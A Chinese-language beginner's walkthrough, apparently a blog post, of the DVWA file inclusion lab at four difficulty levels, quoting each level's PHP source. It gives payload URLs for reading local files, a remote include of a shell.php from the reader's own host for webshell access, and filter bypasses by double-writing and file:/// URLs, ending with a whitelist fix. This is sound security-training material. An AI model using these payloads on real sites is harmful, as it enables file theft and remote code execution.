服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这就可以将所有页面共用的页面用包含的形式来调用,无需重复编写,这种方式就是文件包含。
若这种包含没有相应的校验,就会使hacker传入恶意的代码来查看敏感文件,造成文件泄露等等
文件包含有两种类型:本地文件包含和远程文件包含
文件包含涉及到四个危险函数:
require():包含并且运行,包含文件发生错误时终止程序require_once():与require()相似,但是只导入一次
include():包含并运行,包含文件发生错误时,发出警告并继续运行
include_once():与include()相似,但是会检验是否被导入,可以理解为只导入一次
接下来开始实验吧~
low level
查看源代码:
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
?>
可以看到代码没有任何限制过滤,可以任意包含文件…
首先随便写个包含文件:
http://localhost/DVWA/vulnerabilities/fi/?page=111.php
直接报出了网站路径。。。
需要说明的是:不管文件后缀是否是php,都会当做php文件执行,如果文件内容确认为php,则正常执行并返回结果,如果不是,则返回打印文件内容,所以文件包含漏洞常常会导致任意文件读取与任意命令执行。
例如:
http://localhost/DVWA/vulnerabilities/fi/?page=E:/webpage/public/DVWA/php.ini
显示:
会将里边的内容显示出来
这种情况也可能存在远端文件包含漏洞
查看是否存在远端文件包含:
例如:
http://localhost/DVWA/vulnerabilities/fi/?page=http://yourip/shell.php
有条件可以测试一下,若存在可以直接通过蚁剑连接
medium level
查看源码:
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );
?>
可以看到代码中str_replace()函数对“http://”、“https://”、“…/”、“…\”进行了过滤替换为空字符,即删除~
这中类型的过滤可以直接 双写绕过
,例如:hthttps://tps://
、htthttp://p://
,其他的跟low level一样,不受影响。
high level
查看源代码:
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
fnmatch() 函数是对照指定的pattern来匹配filename或strings。
也就是要求page参数的开头必须是file,服务器才会去包含相应的文件。
这个就跟用浏览器打开本地文件一样,直接构造payload:
http://localhost/DVWA/vulnerabilities/fi/?page=file:///E:/webpage/public/DVWA/php.ini
同样可以访问本地文件~
impossible level
看代码:
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
这种类似于白名单方式,只能是在白名单里的页面可以访问,完美避过了其他文件包含
<小白初试,希望路过大佬多多指正>